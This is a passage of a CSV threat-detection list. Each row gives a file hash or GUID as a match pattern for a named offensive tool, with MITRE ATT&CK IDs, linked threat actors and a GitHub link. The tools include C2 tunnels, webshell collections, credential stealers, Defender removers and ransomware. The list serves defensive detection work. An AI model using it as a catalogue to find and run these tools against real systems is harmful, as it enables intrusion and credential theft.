and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","32617" 
"*a67543b2c8434f6af3224b63e88885c68981e8145729c815505d18d31f0a49ac*",".{0,1000}a67543b2c8434f6af3224b63e88885c68981e8145729c815505d18d31f0a49ac.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32618" "*a67edb34ce2c10bb5c170445344da4ad809932ff8e82e2b6c45a260d5a47a859*",".{0,1000}a67edb34ce2c10bb5c170445344da4ad809932ff8e82e2b6c45a260d5a47a859.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","#filehash","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","32620" "*a681dd702f47215b0bf02a6f100f677d006f1e674c56519e39b888dd78779b40*",".{0,1000}a681dd702f47215b0bf02a6f100f677d006f1e674c56519e39b888dd78779b40.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32621" "*a6ac2ea4562765fec4f8a9648b57983ea620dd93122567d3db8e996ea14194f1*",".{0,1000}a6ac2ea4562765fec4f8a9648b57983ea620dd93122567d3db8e996ea14194f1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32623" 
"*a6b199a57d6b2f7bc067e6dfa8433f8236b51e43a171b262289a948d6ea43472*",".{0,1000}a6b199a57d6b2f7bc067e6dfa8433f8236b51e43a171b262289a948d6ea43472.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32626" "*a6b59942fdee9a1b50b37f53a44b22de11cf97dd48828495cb6da46bc00378de*",".{0,1000}a6b59942fdee9a1b50b37f53a44b22de11cf97dd48828495cb6da46bc00378de.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","0","#filehash","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","32627" "*a6d05bbe01016498df38a529495f160b8fae84d8d325811e205da5300679daf4*",".{0,1000}a6d05bbe01016498df38a529495f160b8fae84d8d325811e205da5300679daf4.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32629" "*a6f37544d43d1d50d3a860e72e723079bb1fc7f7e956089cade9b41d1a585c2f*",".{0,1000}a6f37544d43d1d50d3a860e72e723079bb1fc7f7e956089cade9b41d1a585c2f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32636" "*a6f4ff21424c038ace4944d8330ba61a0f87dfa953faf7349992ef08a04f5bdf*",".{0,1000}a6f4ff21424c038ace4944d8330ba61a0f87dfa953faf7349992ef08a04f5bdf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32638" "*a6f73c1a75d14322aa4993fe498299ab55866ba74440f8a52d4dffe85594de2f*",".{0,1000}a6f73c1a75d14322aa4993fe498299ab55866ba74440f8a52d4dffe85594de2f.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32639" "*A6F8500F-68BC-4EFC-962A-6C6E68D893AF*",".{0,1000}A6F8500F\-68BC\-4EFC\-962A\-6C6E68D893AF.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#GUIDproject","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","32640" "*a6fa0c8acd7fae1a71d6f623caf345eb427b40db045c081f394b0e67e9bc14a5*",".{0,1000}a6fa0c8acd7fae1a71d6f623caf345eb427b40db045c081f394b0e67e9bc14a5.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - 
T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","32641" "*a6fa768c4964c328c748558627c20c2ba455e589a1b87cfa3911d197da1688d2*",".{0,1000}a6fa768c4964c328c748558627c20c2ba455e589a1b87cfa3911d197da1688d2.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32642" "*a6fb80cdc98d67bc7276ea726507b34ebb741345ff6b61973580c25bc1fa84dc*",".{0,1000}a6fb80cdc98d67bc7276ea726507b34ebb741345ff6b61973580c25bc1fa84dc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32643" "*a6fe51ded3889aaf77c7b55814220c6e2ba19fac731f4387c472713d3b454dca*",".{0,1000}a6fe51ded3889aaf77c7b55814220c6e2ba19fac731f4387c472713d3b454dca.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","32644" "*A6FF9B59C25CE7EED2D73C5310BCE5E57071601D3F61E0F9C03715FEE99A1085*",".{0,1000}A6FF9B59C25CE7EED2D73C5310BCE5E57071601D3F61E0F9C03715FEE99A1085.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 
- T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32645" "*a70756f3fce0b8fbc9bfbdb422b9ef10f83e4e9020b7dca8e691eb51ff89949c*",".{0,1000}a70756f3fce0b8fbc9bfbdb422b9ef10f83e4e9020b7dca8e691eb51ff89949c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32648" "*a70c8c13e7173e19cb3aa035297921d69b0de0b6b495e052258e143ec7efed03*",".{0,1000}a70c8c13e7173e19cb3aa035297921d69b0de0b6b495e052258e143ec7efed03.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. 
Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","#filehash","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","32649" "*a712ea7de1e93b1e8cf780d6e0d042fcf5e277171f6cccfa5d48e20a48a2ac16*",".{0,1000}a712ea7de1e93b1e8cf780d6e0d042fcf5e277171f6cccfa5d48e20a48a2ac16.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32650" "*a714b3a2ea1103e9571476a2d6c2a2063938782d5b2f362b19854572551ec6f8*",".{0,1000}a714b3a2ea1103e9571476a2d6c2a2063938782d5b2f362b19854572551ec6f8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32651" "*a71a8916d6a82bcd0d80cc8150699754abdd4c165773438b9ed39515372a4ec8*",".{0,1000}a71a8916d6a82bcd0d80cc8150699754abdd4c165773438b9ed39515372a4ec8.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","32652" "*a71ca78d1c4b0dc8d6c35c883b18034a5b505886cc74fed0003c5e095494b1c8*",".{0,1000}a71ca78d1c4b0dc8d6c35c883b18034a5b505886cc74fed0003c5e095494b1c8.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised 
machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","32653" "*A71FCCEB-C1C5-4ADB-A949-462B653C2937*",".{0,1000}A71FCCEB\-C1C5\-4ADB\-A949\-462B653C2937.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","32655" "*a7287ab77d0fca96bdc4dc3df6c699923c559f6270f3d895b176b6623dcdacd9*",".{0,1000}a7287ab77d0fca96bdc4dc3df6c699923c559f6270f3d895b176b6623dcdacd9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32657" "*A7397316-0AEF-4379-B285-C276DE02BDE1*",".{0,1000}A7397316\-0AEF\-4379\-B285\-C276DE02BDE1.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2008R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#GUIDproject","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","32659" "*a744ea58259da195e1ba7b7af5215656622649f2ddab02e66e9794b7770efaf4*",".{0,1000}a744ea58259da195e1ba7b7af5215656622649f2ddab02e66e9794b7770efaf4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - 
T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32663" "*a74524600479028cf1f6231ddfa1e701c98f333667461a3b20124ee3b36bd650*",".{0,1000}a74524600479028cf1f6231ddfa1e701c98f333667461a3b20124ee3b36bd650.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32664" "*a7469955bff5e489d2270d9b389064e1*",".{0,1000}a7469955bff5e489d2270d9b389064e1.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","32665" "*a749e86de5d9f621605a3ca4c2e57a90a03e40fae39b1bcd2025116c0e228962*",".{0,1000}a749e86de5d9f621605a3ca4c2e57a90a03e40fae39b1bcd2025116c0e228962.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32667" "*a74bc97d32a17a7c5a401229100635b8aee9907da5b6e6c6641ae6af9a81b7f2*",".{0,1000}a74bc97d32a17a7c5a401229100635b8aee9907da5b6e6c6641ae6af9a81b7f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds 
of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32668" "*a74c869d811226c39ec9a3889bf9f017068baa0f69cf855ffdcc34b601777e04*",".{0,1000}a74c869d811226c39ec9a3889bf9f017068baa0f69cf855ffdcc34b601777e04.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32670" "*a74de3599c61edef0e96fa489513449bfeb2fd46dc4cb7d1af3c22c15ae0554b*",".{0,1000}a74de3599c61edef0e96fa489513449bfeb2fd46dc4cb7d1af3c22c15ae0554b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32671" "*a756ddc08156eddb07bdddea3cc3c75748f854e4c0388e90b17017fc55bc02b6*",".{0,1000}a756ddc08156eddb07bdddea3cc3c75748f854e4c0388e90b17017fc55bc02b6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32672" "*a757785e20597ffb527b7a2a1c79254ff082c30b700a2530ad9b5c40db15f5ac*",".{0,1000}a757785e20597ffb527b7a2a1c79254ff082c30b700a2530ad9b5c40db15f5ac.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32673" 
"*a759d0c0f5f52fe8512a7cc81191c309f7bed4f65b8ff739d51dabf6ba5b896f*",".{0,1000}a759d0c0f5f52fe8512a7cc81191c309f7bed4f65b8ff739d51dabf6ba5b896f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32674" "*a75a1abcf2235c58fdcd4a6dd7c7347eeec4a094696c255bc8d45026d2c94e6c*",".{0,1000}a75a1abcf2235c58fdcd4a6dd7c7347eeec4a094696c255bc8d45026d2c94e6c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","32676" "*a75c79d0fbcc1c76214625d2924fa60e2c74bf8b4b40bf191a1f68a4b28e748d*",".{0,1000}a75c79d0fbcc1c76214625d2924fa60e2c74bf8b4b40bf191a1f68a4b28e748d.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation 
tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","32677" "*a760cde750a65dd7e7ea970c57f662c91c7614d33d69b4720ea630db4961ff1e*",".{0,1000}a760cde750a65dd7e7ea970c57f662c91c7614d33d69b4720ea630db4961ff1e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","32678" "*a771136ec4681f7b160ec60642134a43b79c4da8e04e787371978b1bcb3e02cb*",".{0,1000}a771136ec4681f7b160ec60642134a43b79c4da8e04e787371978b1bcb3e02cb.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32680" "*a77a13a5a04bd0753a883fbefab58bc0504cd151303e285bb3799d6c38196a30*",".{0,1000}a77a13a5a04bd0753a883fbefab58bc0504cd151303e285bb3799d6c38196a30.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","32681" "*a77ae629a1c7ca5f0be0d4d4edfd2198914db2ff2963ae1f66bbc87fd0b5a4bf*",".{0,1000}a77ae629a1c7ca5f0be0d4d4edfd2198914db2ff2963ae1f66bbc87fd0b5a4bf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32682" "*a77af4413613ff9991001e8e86f5409352de6c6c9994d467c5c84e587ae3695e*",".{0,1000}a77af4413613ff9991001e8e86f5409352de6c6c9994d467c5c84e587ae3695e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32683" "*a785efdc2a95072fe9caece4fd872ae1f543777b60cce590a847180c3926a9b2*",".{0,1000}a785efdc2a95072fe9caece4fd872ae1f543777b60cce590a847180c3926a9b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32685" "*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*",".{0,1000}a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","#filehash","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","32686" "*a78b41d1e1383a0aefbaba58881d1aa5b4a76457828ab5d60cb3b10ab075ca49*",".{0,1000}a78b41d1e1383a0aefbaba58881d1aa5b4a76457828ab5d60cb3b10ab075ca49.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","32687" "*a78d737f30e03d166d4e3e3b2dca71d54f1cbf582206dfe16a1e717ce3dc0ef7*",".{0,1000}a78d737f30e03d166d4e3e3b2dca71d54f1cbf582206dfe16a1e717ce3dc0ef7.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop 
Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#filehash","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","32688" "*a78f78fa018f18e2f95f4b535ab7fe78c5387242ecca1fcff674ca87140ad367*",".{0,1000}a78f78fa018f18e2f95f4b535ab7fe78c5387242ecca1fcff674ca87140ad367.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","32689" "*a7901b1d6e2081a5cf79150190a4d53f441295a803ac78787591450281de04da*",".{0,1000}a7901b1d6e2081a5cf79150190a4d53f441295a803ac78787591450281de04da.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32690" 